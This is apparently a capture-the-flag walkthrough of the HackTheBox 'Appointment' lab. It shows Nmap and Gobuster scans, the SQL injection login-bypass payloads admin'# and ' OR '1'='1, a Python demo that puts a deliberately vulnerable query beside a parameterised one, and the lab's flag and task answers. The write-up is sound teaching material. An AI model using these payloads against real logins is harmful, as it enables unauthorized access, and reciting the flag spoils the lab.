HTB Labs — Tier 1 — “Appointment” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Welcome to a new walkthrough powered by HTB, Tier 1, named “Appointment”. The Appointment machine is designed to teach basic SQL injection concepts and authentication bypass techniques, focusing on a SQL injection vulnerability in a web application login. The machine has only port 80 open, running Apache httpd 2.4.38 and hosting a simple login page. The login form is vulnerable to SQL injection, which allows the authentication to be bypassed.
Executive Summary
Here is an executive summary of the steps we are going to follow:
Stage I: Scanning
We will use Nmap to reveal the open ports and the services that are running on the target. We will find that port 80 is open with Apache httpd 2.4.38 behind it.
The Nmap scan will report the following:
- Service Running: Apache httpd (Debian build)
- Service Version: 2.4.38
- Exposed Port: 80/tcp
Stage II: Enumeration
We will map the target IP address to the hostname appointment.htb in our local /etc/hosts file and open the login page in a browser.
Stage III: Exploiting
The login form is vulnerable to SQL injection. Entering admin'# as the username (with any password, or none) bypasses authentication. This works because in MySQL the # starts a comment: everything after it, including the AND password=... check, is ignored, so the query reduces to a lookup of the user named admin.
Let’s not waste more time on the introduction and begin hacking in detail!
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Starting to Solve the Tasks.
Task 1: What does the acronym SQL stand for?
Answer: Structured Query Language
Walkthrough:
SQL is a domain-specific language for defining, querying and manipulating data in relational databases.
Task 2: What is one of the most common SQL vulnerabilities?
Answer: SQL Injection
Walkthrough:
One of the most common SQL vulnerabilities is SQL injection. This occurs when an attacker inserts malicious SQL code into input fields that are directly incorporated into SQL queries without proper validation or sanitization.
In a SQL injection attack, the attacker manipulates the application’s SQL query by inserting specially crafted input that changes the intended behavior of the query.
A classic example is entering ' OR '1'='1 into a login form. Suppose the application builds its query by concatenating the two form fields:
SELECT * FROM users WHERE username='input_username' AND password='input_password'
Sending the payload in the password field turns it into:
SELECT * FROM users WHERE username='x' AND password='' OR '1'='1'
Because AND binds tighter than OR, the database reads this as (username='x' AND password='') OR '1'='1'. The condition '1'='1' is always true, so the query returns rows and authentication can be bypassed. Note that the same payload placed in the username field gives username='' OR '1'='1' AND password='...', which still requires the password to match; this is why the comment-based payload used later in this walkthrough is the more reliable one.
The best defenses against SQL injection include using parameterized queries (prepared statements), input validation, stored procedures, and the principle of least privilege for database accounts.
Task 3: What is the 2021 OWASP Top 10 classification for this vulnerability?
Answer: A03:2021 — Injection
Walkthrough:
In the 2021 update, OWASP consolidated various types of injection vulnerabilities (including SQL injection, LDAP injection, OS command injection, etc.) into this single broader category, ranking it as the third most critical web application security risk.
Task 4: What does Nmap report as the service and version that are running on port 80 of the target?
Answer: Apache httpd 2.4.38 ((Debian))
Walkthrough:
We will use Nmap to discover which ports are open on the target and which services are listening on them. We can run Nmap directly with the flags we want (for Task 4 the relevant one is -sV, which asks Nmap to identify service names and versions), or use a wrapper script that runs a preset sequence of scans.
One such wrapper is nmapAutomator. You may download it through the following link.
I will use it to run a full scan against the target IP. With --type all it chains its whole sequence of scans (port, script, full port range, UDP and vulnerability scans) rather than a single Nmap invocation.
Usage is straightforward and documented in the README on GitHub. To perform a full scan, run:
bash nmapAutomator.sh --host 10.129.83.105 --type all

Task 5: What is the standard port used for the HTTPS protocol?
Answer: 443
Walkthrough:
While HTTP uses port 80, HTTPS (HTTP Secure) uses port 443 by default. Traffic on this port is protected by TLS (historically SSL), which encrypts the communication between the browser and the server.
Task 6: What is a folder called in web application terminology?
Answer: directory
Walkthrough:
When referring to the structure of websites and web applications, the term “directory” is the standard technical term for what might be called a “folder” in general. For example:
- Root directory (/)
- Subdirectory (/images)
- Parent directory (../)
Task 7: What is the HTTP response code given for ‘Not Found’ errors?
Answer: 404
Walkthrough:
Every HTTP response carries a numeric status code, and we will see several of them while enumerating the server. 404 is one of the best-known status codes: the server returns it when a client requests a URL that does not exist on the server.


Task 8: Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?
Answer: dir
Walkthrough:
When using Gobuster to brute force directories on a web server, we use the dir mode. The command is:
gobuster dir -u http://10.129.21.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The dir keyword tells Gobuster to enumerate directories (and files) on the target web server, 10.129.21.111, rather than DNS subdomains (dns mode) or virtual hosts (vhost mode).
The IP of the target has changed from the one used above because the machine was reset.
Optionally, add a line to /etc/hosts mapping the target IP to appointment.htb. /etc/hosts is consulted before DNS, so the name then resolves locally and you can browse to http://appointment.htb.

Enumeration takes a while, depending on the size of the wordlist; let it finish before reading the results.
Directories found by Gobuster typically show up with HTTP status 301. A 301 means the requested resource has moved permanently to the URL given in the response's Location header; here Apache redirects /dir to /dir/, and browsers and search engines follow the redirect and update their references for future requests.
Task 9: What single character can be used to comment out the rest of a line in MySQL?
Answer: #
Walkthrough:
MySQL treats everything from a hash (#) to the end of the line as a comment, so it is the single-character option. Note that # is MySQL-specific; other databases such as PostgreSQL and SQLite do not treat it as a comment marker.
MySQL also supports two other comment styles:
1- Double dash followed by whitespace (-- ): everything after it to the end of the line is a comment. The trailing space is required in MySQL, which is why this payload is usually written as admin'-- with a space after the dashes.
2- C-style comments (/* ... */): everything between /* and */ is a comment, and it can span multiple lines.
Task 10: If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
Answer: Congratulations
Walkthrough:
For a login form vulnerable to SQL injection, the attacker might input something like:
- Username: admin'# (or admin'-- with a trailing space)
- Password: anything, or empty
If the application concatenates these values into its query, the database receives:
SELECT * FROM users WHERE username='admin'#' AND password='whatever'
The single quote after admin closes the string literal, and everything after # is a comment, so the query the database actually runs reduces to SELECT * FROM users WHERE username='admin'. The password comparison is gone: the application only checks whether a user named "admin" exists and, if it does, treats the request as a successful login for that account. Without the closing quote, the # would simply be part of the username value and nothing would be injected.
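To make the two query transformations above concrete (the ' OR '1'='1 case from Task 2 and the comment bypass from this task), here is an added example that is not part of the original write-up. It models the login with an in-memory SQLite database; the table layout, user names and passwords are constructed for the demo. SQLite accepts the -- comment but rejects MySQL's #, so the admin'# payload is only rendered as a query string here, while the equivalent admin'-- payload is executed. The login_safe function shows the parameterised query that defeats both payloads.

```python
"""Added example (not code from the original write-up): model the
Appointment login query with an in-memory SQLite database and show
(a) why the comment payload removes the password check and
(b) why the placement of ' OR '1'='1' matters.
The table layout, user names and passwords are constructed for this
demo. SQLite accepts the '-- ' comment but rejects MySQL's '#', so the
'#' payload is only rendered as a query string here, not executed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table; 'admin' is inserted first (lowest rowid)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cretPassw0rd!"), ("alice", "wonderland")],
    )
    con.commit()
    return con


def build_query(username: str, password: str) -> str:
    """The vulnerable pattern: untrusted input concatenated into the SQL text."""
    return (
        "SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """Run the concatenated query; return the matched username or None.
    A syntax error (e.g. the '#' payload on SQLite) counts as a failed login."""
    try:
        row = con.execute(build_query(username, password)).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the driver binds the values, so quotes and
    comment markers in the input are data, never SQL syntax."""
    row = con.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("admin", "S3cretPassw0rd!"),  # legitimate login
        ("admin", "wrong"),            # wrong password
        ("admin'-- ", "anything"),     # comment payload: password clause dropped
        ("' OR '1'='1", "wrong"),      # OR in username: AND binds tighter, still fails
        ("nobody", "' OR '1'='1"),     # OR in password: whole WHERE becomes true
    ]
    for user, pw in cases:
        print(build_query(user, pw))
        print(f"  vulnerable -> {login_vulnerable(db, user, pw)!r}"
              f"   safe -> {login_safe(db, user, pw)!r}")
    # The MySQL-style payload from the walkthrough, rendered only:
    print(build_query("admin'#", "whatever"))
```

Running the script prints each constructed query next to what the vulnerable and the parameterised login return for it. The interesting rows are the third and fourth: admin'-- logs in as admin without a password, while ' OR '1'='1 in the username field fails because the password clause is still evaluated.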
First, map the target IP address to the hostname on your Kali Linux machine: edit /etc/hosts and add a line containing the target IP followed by appointment.htb.

Second, browse to http://appointment.htb. You will be redirected to the following login page:

Third, test whether the login is vulnerable to SQL injection by entering admin'# as the username and typing anything in the “password” field.
You may leave the password field empty as well.
If the injection works, the server never compares a password for admin: the comment discards the rest of the query, so it only checks whether a user called admin exists.

The following page appears, confirming that the login was bypassed and revealing the flag.

Task 11: Submit root flag
Answer: e3d0796d002a446c0e622226f42e9672
Walkthrough:
The root flag of the “Appointment” machine is “e3d0796d002a446c0e622226f42e9672”
Hope you enjoyed reading my blog about solving the Appointment machine from HTB — Tier 1— Starting Point Phase.
See you in another write-up!


